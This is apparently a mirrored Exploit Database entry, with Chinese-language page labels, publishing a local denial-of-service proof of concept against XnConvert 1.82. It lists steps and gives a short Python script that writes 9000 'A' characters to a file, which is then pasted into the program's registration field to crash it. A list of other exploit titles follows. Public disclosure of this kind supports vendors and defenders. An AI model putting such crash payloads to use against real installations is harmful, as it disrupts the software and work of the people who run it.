XnConvert 1.82 – Denial of Service (PoC)

Exploit Database
14 阅读

作者： Gokkulraj

日期： 2019-12-23
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/47801/

# Exploit Title: XnConvert 1.82 - Denial of Service (PoC)
# Date: 2019-12-21
# Vendor Homepage: https://www.xnview.com
# Software Link: https://www.xnview.com/en/apps/
# Exploit Author: Gokkulraj (TwinTech Solutions)
# Tested Version: v1.82
# Tested on: Windows 7 x64

# 1.- Download and install XnConvert
# 2.- Run python code : XnConvert.py
# 3.- Open EVIL.txt and copy content to clipboard
# 4.- Open XnConvert and Click 'EnterKey'
# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash.

#!/usr/bin/env python
Dos= "\x41" * 9000
myfile=open('Evil.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")

last Exploits
XnConvert 1.82 – Denial of Service (PoC)的更多信息

Media Player Classic – Heap Overflow / Denial of Service：
Foxit Reader 4.1.1 – Stack Overflow：
VideoLAN VLC Media Player 2.2.1 – libvlccore ‘.mp3’ Stack Overflow：
Linux Kernel 2.6.37 – Unix Sockets Local Denial of Service：
SQLite Browser 2.0b1 – Local Denial of Service：
TurboFTP Server 1.00.712 – Remote Denial of Service：
Mobipocket Reader 6.2 Build 608 – Buffer Overflow：
River Past Audio Converter 7.7.16 – Denial of Service (PoC)：